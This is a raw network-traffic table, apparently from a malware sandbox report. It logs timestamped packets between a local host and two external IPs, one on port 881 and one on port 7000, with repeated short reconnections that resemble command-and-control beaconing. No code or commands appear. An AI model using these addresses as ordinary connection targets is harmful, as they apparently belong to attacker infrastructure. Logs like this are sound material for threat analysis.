Jul 2, 2024 19:28:29.863387108 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:29.863409996 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:29.863446951 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.095968008 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.095989943 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.096009016 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.096023083 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.096035004 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.096048117 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.096066952 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.096102953 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.096159935 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.096589088 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.096633911 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.096646070 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.096648932 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.096690893 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.096981049 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.097033024 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.097039938 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.097053051 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.097078085 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.097083092 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.097110033 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.097121954 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.097568989 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.097630024 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.097656965 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.097671032 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.097711086 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.097753048 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.097764969 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.097775936 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.097812891 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.097822905 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.098603010 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.098623037 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.098635912 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.098684072 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.098717928 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.100944996 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.100987911 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.101000071 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.101031065 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.101074934 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.333867073 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.333894014 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.333911896 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.333985090 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.334019899 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334022045 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.334036112 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334069967 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.334088087 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.334187984 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334201097 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334212065 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334224939 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334268093 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.334295034 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.334517002 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334573030 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334584951 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334686995 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.334724903 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334737062 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334748030 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334760904 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334783077 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.334814072 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.334870100 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334881067 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334899902 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334911108 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334920883 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.334923029 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.334943056 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.334975958 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.335053921 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.335108042 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.335113049 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.335123062 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:30.335155010 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:30.335171938 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:33.976310968 CEST	49705	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:33.982199907 CEST	7000	49705	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:33.982322931 CEST	49705	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:34.133347988 CEST	49705	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:34.140198946 CEST	7000	49705	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:36.026778936 CEST	7000	49705	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:36.026895046 CEST	49705	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:38.230879068 CEST	49705	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:38.232021093 CEST	49706	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:38.329329014 CEST	7000	49705	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:38.329349995 CEST	7000	49706	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:38.329457998 CEST	49706	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:38.348588943 CEST	49706	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:38.353410959 CEST	7000	49706	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:40.407445908 CEST	7000	49706	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:40.407612085 CEST	49706	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:42.856028080 CEST	49706	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:42.857079983 CEST	49707	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:42.860884905 CEST	7000	49706	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:42.861937046 CEST	7000	49707	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:42.862031937 CEST	49707	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:42.881903887 CEST	49707	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:42.886727095 CEST	7000	49707	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:44.918209076 CEST	7000	49707	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:44.918303013 CEST	49707	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:47.668339968 CEST	49707	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:47.669306993 CEST	49711	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:47.673125982 CEST	7000	49707	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:47.674092054 CEST	7000	49711	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:47.674170017 CEST	49711	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:47.692500114 CEST	49711	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:47.697633028 CEST	7000	49711	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:49.727883101 CEST	7000	49711	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:49.728066921 CEST	49711	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:52.248625040 CEST	49711	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:52.250701904 CEST	49713	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:52.253509045 CEST	7000	49711	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:52.255513906 CEST	7000	49713	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:52.255599976 CEST	49713	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:52.275149107 CEST	49713	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:52.280083895 CEST	7000	49713	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:54.340235949 CEST	7000	49713	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:54.340312958 CEST	49713	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:56.700304031 CEST	49713	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:56.705400944 CEST	7000	49713	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:56.714132071 CEST	49714	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:56.719387054 CEST	7000	49714	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:56.719460964 CEST	49714	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:56.739486933 CEST	49714	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:28:56.744326115 CEST	7000	49714	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:58.758990049 CEST	7000	49714	134.122.174.169	192.168.2.8
Jul 2, 2024 19:28:58.759172916 CEST	49714	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:00.856168985 CEST	49714	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:00.858120918 CEST	49715	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:00.862200022 CEST	7000	49714	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:00.864435911 CEST	7000	49715	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:00.864561081 CEST	49715	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:00.884074926 CEST	49715	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:00.889061928 CEST	7000	49715	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:03.000802040 CEST	7000	49715	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:03.003321886 CEST	49715	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:04.045006037 CEST	7000	49715	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:04.045101881 CEST	49715	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:04.045387030 CEST	7000	49715	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:04.045532942 CEST	49715	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:04.046406031 CEST	7000	49715	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:04.046448946 CEST	49715	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:05.996850967 CEST	49715	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:05.997647047 CEST	49716	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:06.001799107 CEST	7000	49715	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:06.003313065 CEST	7000	49716	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:06.003410101 CEST	49716	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:06.021646023 CEST	49716	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:06.026702881 CEST	7000	49716	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:08.043705940 CEST	7000	49716	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:08.043961048 CEST	49716	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:10.762177944 CEST	49716	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:10.762948990 CEST	49717	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:10.768543959 CEST	7000	49716	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:10.768567085 CEST	7000	49717	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:10.768826008 CEST	49717	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:10.786794901 CEST	49717	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:10.791789055 CEST	7000	49717	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:12.842320919 CEST	7000	49717	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:12.842571974 CEST	49717	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:15.075278997 CEST	49717	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:15.076682091 CEST	49718	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:15.080553055 CEST	7000	49717	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:15.081527948 CEST	7000	49718	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:15.081604004 CEST	49718	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:15.101865053 CEST	49718	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:15.106657028 CEST	7000	49718	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:17.137783051 CEST	7000	49718	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:17.137900114 CEST	49718	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:17.949788094 CEST	49718	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:17.950609922 CEST	49719	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:17.954654932 CEST	7000	49718	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:17.955485106 CEST	7000	49719	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:17.955566883 CEST	49719	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:18.029570103 CEST	49719	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:18.034441948 CEST	7000	49719	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:20.018265963 CEST	7000	49719	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:20.019418955 CEST	49719	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:20.934309006 CEST	49719	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:20.935250998 CEST	49720	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:20.939166069 CEST	7000	49719	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:20.939976931 CEST	7000	49720	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:20.940057993 CEST	49720	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:20.956511021 CEST	49720	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:20.961246014 CEST	7000	49720	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:22.997792959 CEST	7000	49720	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:22.997999907 CEST	49720	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:23.122723103 CEST	49720	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:23.125220060 CEST	49721	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:23.127971888 CEST	7000	49720	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:23.130347013 CEST	7000	49721	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:23.130433083 CEST	49721	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:23.148993969 CEST	49721	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:23.153898954 CEST	7000	49721	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:25.207961082 CEST	7000	49721	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:25.208028078 CEST	49721	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:25.246500969 CEST	49721	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:25.247504950 CEST	49723	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:25.251355886 CEST	7000	49721	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:25.252393961 CEST	7000	49723	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:25.252507925 CEST	49723	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:25.268573999 CEST	49723	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:25.273328066 CEST	7000	49723	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:27.311175108 CEST	7000	49723	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:27.311291933 CEST	49723	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:28.043549061 CEST	49723	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:28.044406891 CEST	49724	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:28.052660942 CEST	7000	49723	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:28.052681923 CEST	7000	49724	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:28.052781105 CEST	49724	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:28.074209929 CEST	49724	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:28.296025991 CEST	7000	49724	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:30.357527971 CEST	7000	49724	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:30.357755899 CEST	49724	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:30.371830940 CEST	49724	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:30.373817921 CEST	49725	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:30.381127119 CEST	7000	49724	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:30.383019924 CEST	7000	49725	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:30.383121967 CEST	49725	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:30.404948950 CEST	49725	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:30.409857988 CEST	7000	49725	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:32.449202061 CEST	7000	49725	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:32.449390888 CEST	49725	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:32.450090885 CEST	49725	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:32.450882912 CEST	49726	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:32.454871893 CEST	7000	49725	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:32.455851078 CEST	7000	49726	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:32.455929041 CEST	49726	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:32.471954107 CEST	49726	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:32.477111101 CEST	7000	49726	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:34.498267889 CEST	7000	49726	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:34.499460936 CEST	49726	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:34.668479919 CEST	49726	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:34.669548988 CEST	49727	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:34.673389912 CEST	7000	49726	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:34.674465895 CEST	7000	49727	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:34.674576998 CEST	49727	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:34.692864895 CEST	49727	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:34.698232889 CEST	7000	49727	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:35.336400986 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:29:35.336479902 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:29:36.734227896 CEST	7000	49727	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:36.734396935 CEST	49727	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:36.746668100 CEST	49727	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:36.747662067 CEST	49728	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:36.751909971 CEST	7000	49727	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:36.752630949 CEST	7000	49728	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:36.752748966 CEST	49728	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:36.771080971 CEST	49728	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:36.776181936 CEST	7000	49728	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:38.815767050 CEST	7000	49728	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:38.819447041 CEST	49728	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:41.918674946 CEST	49728	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:41.920906067 CEST	49729	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:41.923747063 CEST	7000	49728	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:41.925842047 CEST	7000	49729	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:41.930165052 CEST	49729	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:41.969808102 CEST	49729	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:41.974771976 CEST	7000	49729	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:42.015000105 CEST	49729	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:42.019961119 CEST	7000	49729	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:42.090840101 CEST	49729	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:42.095798016 CEST	7000	49729	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:42.121920109 CEST	49729	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:42.127079964 CEST	7000	49729	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:42.168849945 CEST	49729	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:42.175358057 CEST	7000	49729	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:42.184633017 CEST	49729	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:42.189603090 CEST	7000	49729	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:43.986831903 CEST	7000	49729	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:43.987436056 CEST	49729	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:47.355896950 CEST	49729	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:47.359031916 CEST	49730	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:47.360843897 CEST	7000	49729	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:47.363862038 CEST	7000	49730	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:47.363931894 CEST	49730	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:47.403584003 CEST	49730	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:47.408487082 CEST	7000	49730	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:47.449882984 CEST	49730	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:47.454794884 CEST	7000	49730	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:47.622065067 CEST	49730	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:47.626965046 CEST	7000	49730	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:47.684367895 CEST	49730	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:47.689425945 CEST	7000	49730	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:49.420674086 CEST	7000	49730	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:49.420816898 CEST	49730	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:52.731872082 CEST	49730	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:52.736932039 CEST	7000	49730	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:52.747356892 CEST	49733	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:52.752541065 CEST	7000	49733	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:52.752702951 CEST	49733	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:52.843358040 CEST	49733	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:52.848433971 CEST	7000	49733	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:54.811248064 CEST	7000	49733	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:54.813591003 CEST	49733	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:57.887480021 CEST	49733	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:57.889550924 CEST	49734	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:57.895581961 CEST	7000	49733	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:57.897670031 CEST	7000	49734	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:57.897751093 CEST	49734	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:57.939336061 CEST	49734	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:57.944247007 CEST	7000	49734	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:58.012744904 CEST	49734	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:58.018102884 CEST	7000	49734	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:58.059701920 CEST	49734	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:58.065438986 CEST	7000	49734	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:58.090867043 CEST	49734	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:29:58.096223116 CEST	7000	49734	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:59.965584040 CEST	7000	49734	134.122.174.169	192.168.2.8
Jul 2, 2024 19:29:59.965666056 CEST	49734	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:03.371789932 CEST	49734	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:03.374861002 CEST	49735	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:03.376622915 CEST	7000	49734	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:03.379693031 CEST	7000	49735	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:03.382584095 CEST	49735	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:03.426397085 CEST	49735	7000	192.168.2.8	134.122.174.169
Jul 2, 2024 19:30:03.431313038 CEST	7000	49735	134.122.174.169	192.168.2.8
Jul 2, 2024 19:30:03.559552908 CEST	49735	7000	192.168.2.8	134.122.174.169
